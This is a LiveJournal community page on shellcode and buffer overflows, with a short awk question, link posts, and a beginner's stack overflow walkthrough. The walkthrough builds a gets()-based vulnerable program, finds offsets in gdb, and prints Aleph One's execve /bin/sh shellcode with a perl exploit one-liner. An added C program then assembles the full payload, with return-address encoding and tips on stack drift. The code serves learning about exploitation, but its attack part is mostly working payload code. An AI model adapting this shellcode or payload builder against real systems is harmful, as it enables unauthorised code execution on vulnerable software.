Shellcode development / Overflow coding community's Journal
 
Below are the 5 most recent journal entries recorded in Shellcode development / Overflow coding community's LiveJournal:

Monday, July 27th, 2009
5:25 pm
[amaena]
Text manipulation help please
Ok so I have text in the following format

1111 => 2976,Random User,user@user.com
2222 => 562976,Random User2,user2@user.com
3333 => 2678976,Random User3,user3@user.com
4444 => 291176,Random User4,user4@user.com

Basically I want to find in the file where the first column matches a value. Once I have that line identified, I want to replace the 3rd field with a new number. And make the changes in the file to reflect that while leaving everything else as is.

Now I have something that kinda does what I want in the form of:

export EXT=2222
export b1=5050
awk -v var="$EXT" '$1 ~ var {print $3","$4}' file-with-text | awk -F ',' -v nv="$b1" '{$1 = nv; print $1","$2,$3","$4}'

This will produce:
5050,Random User2,user2@user.com

But I am positive this is not the most elegant solution, and I don't know how to properly replace that in the file without being more inefficient.

Help?
(x posted)
Saturday, October 8th, 2005
11:53 am
[coltseavers]
Buffer overflow tutorial for beginner
Hi all,

I am new to this forum and totally new to buffer overflows, so please bear with me. I am trying to
understand how buffer overflows work and I think I am really that close to succeeding
but there is still something missing because I can't get a shell.
So here's what I have done so far, maybe you can spot my mistake:

1. Created a vulnerable C program

$ cat gameover.c
#include <stdio.h>

int echo() {

char buf[200];

gets(buf);
puts(buf);

}

int main() {

printf("Please enter a string:");
echo();
return 0;

}

2. Compiled the software and got the return address for buf:

$ ls
gameover gameover.c

$ gcc -g gameover.c -o gameover
/tmp/ccKSgDEi.o(.text+0x13): In function `echo':
/home/mssf1/gameover.c:7: warning: the `gets' function is dangerous and should
not be used.

$ ls -la gameover*
-rwxr-xr-x 1 myuser myuser 17164 Oct 8 01:25 gameover
-rw-r--r-- 1 myuser myuser 169 Oct 8 00:55 gameover.c

$ gdb gameover
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".

(gdb) break echo
Breakpoint 1 at 0x80483fd: file gameover.c, line 7.

(gdb) run
Starting program: /home/mssf1/gameover

Breakpoint 1, echo () at gameover.c:7
7 gets(buf);
(gdb) next
Please enter a string:textstring
8 puts(buf);
(gdb) print &buf
$1 = (char (*)[200]) 0xbffffcf0
(gdb) quit

So I have the address for buf, and that's 0xbffffcf0. As several runs have
confirmed, this address did not change each time I ran the program, so it is
a constant value. Great.

3. Getting the number of characters to overflow EBP and EIP:

$ perl -e 'print "A"x212' | ./gameover
Please enter a string:AAAAAAAA etc

$ perl -e 'print "A"x216' | ./gameover
Please enter a string:AAAAAAAA etc
Illegal instruction

$ gdb gameover
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".

(gdb) run
Starting program: /home/mssf1/gameover
Please enter a string:AAAAAAAAAAA (212 times)

Program exited normally.

(gdb) run
Starting program: /home/mssf1/gameover
Please enter a string:AAAAAAAAAAAAAAAA (216 times)

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info registers
eax 0x0 0
ecx 0x40018000 1073840128
edx 0x0 0
ebx 0x4014a880 1075095680
esp 0xbffffd08 0xbffffd08
ebp 0x41414141 0x41414141
esi 0x40016540 1073833280
edi 0xbffffe34 -1073742284
eip 0x41414141 0x41414141
eflags 0x286 646
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) quit

Alright so now I know the number of characters to overflow these two registers.

4. Get a shell code and construct the attack

I will try to create my own shellcode next time but this time I downloaded one
from shellcode.org (Aleph's code):

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

This is 45 bytes long, ok. So I then have 216-45=171 bytes left for the return
address and the nops. I then calculated 20 x 4 bytes for the return address
and the rest for the nops and finally I get:

91 x 1 byte nop instruction (91 times)
45 x 1 bytes: shellcode
20 x 4 bytes: return address (20 times)

5. Execute attack

$ perl -e 'print "\x90"x91 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" .
"\x0f\xcf\xff\xfb"x20' | ./gameover
Please enter a string:[the raw payload bytes (NOPs, shellcode, "/bin/sh", 20 copies of the return address) echoed back by puts()]
Illegal instruction

Why does this not work? Where is my mistake here? Thank you very very much.

Keep up the good work!

Best regards,
Colt
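The payload layout described in the post above, as an added example that is not part of the original post: a small C program that assembles the same 216-byte input (a NOP sled, Aleph One's 45-byte shellcode as quoted in the post, then 20 copies of the return address) and writes the address the way i386 stores it in memory, least-significant byte first, so 0xbffffcf0 goes into the buffer as the bytes f0 fc ff bf. The numbers 0xbffffcf0, offset 212 and the 20-copy layout are taken from the post; the function names build_payload, has_bad_bytes and put_le32 are mine. It also checks the finished payload for bytes that would cut the input short in the vulnerable program: gets() stops reading at a newline (0x0a), and a strcpy-style sink would additionally stop at 0x00.

```c
/* mkpayload.c: build the input for a gets()-based stack overflow.
 * Example code written for this page; not from the original post.
 * Assumed from the post: buf at 0xbffffcf0, saved EIP overwritten at
 * offset 212, layout = NOP sled | shellcode | 20 x return address.
 * Build: gcc -o mkpayload mkpayload.c ; use: ./mkpayload | ./gameover
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Aleph One's 45-byte Linux/x86 execve("/bin/sh") shellcode, as quoted in the post. */
static const unsigned char ALEPH_SHELLCODE[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define ALEPH_LEN (sizeof ALEPH_SHELLCODE - 1)   /* drop the C string's trailing NUL */

/* Store a 32-bit value least-significant byte first, as i386 keeps it in
 * memory: 0xbffffcf0 becomes the bytes f0 fc ff bf. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Assemble [NOP sled][shellcode][ret_count copies of ret_addr], sized so the
 * last copy lands exactly on the saved EIP at eip_offset. Returns the payload
 * length (eip_offset + 4), or 0 if the pieces do not fit. */
size_t build_payload(unsigned char *out, size_t outlen, uint32_t ret_addr,
                     size_t eip_offset, size_t ret_count,
                     const unsigned char *sc, size_t sclen)
{
    size_t total = eip_offset + 4;
    size_t ret_bytes = ret_count * 4;
    if (total > outlen || ret_count == 0 || ret_bytes + sclen > total)
        return 0;
    size_t sc_off = total - ret_bytes - sclen;  /* shellcode sits right before the addresses */
    memset(out, 0x90, sc_off);                  /* NOP sled fills the front of buf */
    memcpy(out + sc_off, sc, sclen);
    for (size_t i = 0; i < ret_count; i++)
        put_le32(out + total - ret_bytes + i * 4, ret_addr);
    return total;
}

/* Return 1 if any byte listed in bad[] occurs in the payload. For gets() the
 * only terminator is '\n'; strcpy-style sinks also stop at '\0'. */
int has_bad_bytes(const unsigned char *buf, size_t len,
                  const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return 1;
    return 0;
}

int main(void)
{
    unsigned char payload[512];
    const unsigned char gets_terminators[] = { '\n' };
    size_t n = build_payload(payload, sizeof payload, 0xbffffcf0u, 212, 20,
                             ALEPH_SHELLCODE, ALEPH_LEN);
    if (n == 0 || has_bad_bytes(payload, n, gets_terminators, 1)) {
        fputs("payload does not fit or contains a terminator byte\n", stderr);
        return 1;
    }
    /* No trailing newline is needed: gets() also stops at EOF on the pipe. */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

Two design points worth noting. First, returning to the very start of buf means the sled only absorbs error in one direction: if buf actually lives a little lower than the address seen under gdb (the environment and argv that gdb sets up shift the stack), execution lands before the sled. Pointing the return address some tens of bytes into the sled instead tolerates drift both ways. Second, the address observed inside gdb is not guaranteed to match the address outside it for the same reason, so it is worth confirming the value from a core dump of the real run rather than from the debugger session. The program-side fix is the usual one: replace gets(buf) with fgets(buf, sizeof buf, stdin), which can never write past the 200-byte array.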
Wednesday, September 15th, 2004
1:21 am
[hohf]
Just wanted to post a note that the vuln-dev challenges seem not to be forgotten. :-)

http://archives.neohapsis.com/archives/vuln-dev/2004-q3/0066.html

Current Mood: sleepy
Wednesday, May 26th, 2004
2:53 am
[yaarg]
Shellcode fun...
Thought I would just point out that Pull the Plug is back online.....

Current Mood: sleepy
Sunday, March 21st, 2004
1:19 am
[hohf]
Shellcoder's Handbook
I recently stumbled across this article talking about a book called
the "Shellcoder's Handbook". Sounds quite good to me.

What do you think of it? Maybe somebody read this book? Maybe somebody is going to
read this book? (Maybe somebody even wrote this book?)

http://www.linuxsecurity.com/articles/security_sources_article-9049.html
http://www.nwfusion.com/news/2004/0315experpubli.html